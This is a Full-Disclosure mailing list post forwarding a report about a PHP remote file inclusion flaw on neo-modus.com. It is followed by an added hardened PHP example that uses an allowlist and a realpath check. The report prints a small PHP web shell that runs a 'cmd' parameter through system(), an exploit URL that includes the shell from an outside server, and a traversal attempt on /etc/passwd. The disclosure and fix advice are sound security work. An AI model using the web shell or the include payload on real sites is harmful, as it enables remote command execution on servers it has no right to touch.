> neo-modus.com is the home of the quite popular file sharing utility
> 'direct connect', unfortunately their website is vulnerable to a common php
> include() vulnerability. Message below was sent 2 weeks ago to the 'bugs'
> email address listed on their website. I didn't get any response.
>
> --- Forwarded Message ---
>
> > Dear Reader,
> >
> > I recently stumbled across your website www.neo-modus.com, I fiddled
> > around a bit with the .php scripts, and found that they are vulnerable
> > to a very common php error.
> >
> > The index.php script takes a parameter 'page', so it knows what page to
> > show. It then passes the value of this parameter DIRECTLY into an
> > include() statement. This is very, very bad. Let's say I go to the url:
> > http://www.neo-modus.com/?page=/etc/passwd - this tries to open
> > /etc/passwd.html - so I can break out of the document root and view
> > every file with an .html (or .php?) extension. This seems not too bad,
> > but there's more. PHP has a feature called "furl_open", which allows
> > include() to take a URL as a parameter to include it in its page. So we
> > create a text file on a different webserver (which doesn't parse .txt
> > files) called test.txt, which contains:
> >
> > <?php
> > printf("<div align=\"left\"><pre>");
> > printf("%s", nl2br(system($HTTP_GET_VARS['cmd'])));
> > printf("</pre></div>");
> > ?>
> >
> > we then go to the url
> > http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al
> >
> > and we get a nice "ls -al" output run on YOUR webserver. We can run all
> > commands with privileges of the webserver. I think you can understand
> > how bad this is.
> >
> > To fix these issues, I suggest you disable furl_open in the php
> > configuration file, and filter the "page" parameter passed to index.php
> > so that it strips slashes, backslashes, dots and limits it to a specific
> > directory only.
> >
> > Another thing: don't place files which contain password information in
> > the document root. ConnectToDatabase.php contains sensitive information.
> > Change your mysql passwords, and limit access to the mysql server from
> > YOUR website host only. I could connect without problems - this should
> > not be the case.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
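A hardened version of the index.php include logic the forwarded message describes, as an added example written for this page and not code from the original post or the neo-modus.com site. It assumes a ./pages directory of .html fragments and a hypothetical allowlist of page names; the php.ini directive that stops include() fetching URLs is allow_url_fopen (allow_url_include on newer PHP).

```php
<?php
// Added example (not the neo-modus.com code): serve the page selected by
// ?page=... without ever handing the raw parameter to include().
// Layered defence:
//  1. php.ini: allow_url_fopen = Off (and allow_url_include = Off on PHP >= 5.2),
//     so include() can no longer fetch http://... URLs at all.
//  2. An allowlist of page names: the parameter is a lookup key, not a path.
//  3. A realpath() check that the chosen file still lives under PAGES_DIR,
//     which still catches traversal if the allowlist is later edited carelessly.

define('PAGES_DIR', __DIR__ . '/pages');   // assumed layout: ./pages/<name>.html
define('DEFAULT_PAGE', 'home');

$ALLOWED_PAGES = array('home', 'news', 'download', 'faq'); // hypothetical names, not the real site's

// Return a safe absolute path for an allowlisted page name, or null otherwise.
function resolve_page($requested)
{
    global $ALLOWED_PAGES;
    // Strict comparison: arrays and non-string junk are refused outright.
    if (!is_string($requested) || !in_array($requested, $ALLOWED_PAGES, true)) {
        return null;
    }
    // Belt and braces: only [a-z0-9_-] may reach the filesystem, so "/", "\"
    // and "." (the characters the report says to strip) can never appear.
    if (!preg_match('/^[a-z0-9_-]+$/', $requested)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.html');
    if ($base === false || $path === false) {
        return null;   // directory or page file does not exist
    }
    // realpath() resolves "..", symlinks and absolute paths; anything that does
    // not start with "<pages dir>/" is outside the allowed directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = isset($_GET['page']) ? $_GET['page'] : DEFAULT_PAGE;
$file = resolve_page($page);
if ($file === null) {
    header('HTTP/1.0 404 Not Found');
    echo '<p>Unknown page.</p>';
    exit;
}
include $file;   // the path is now chosen by the server, not by the request
```

With this in place a request such as ?page=/etc/passwd or ?page=http://... fails the allowlist before any filesystem or network access happens, and the realpath() check is a second barrier if someone later adds a careless entry to the list.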
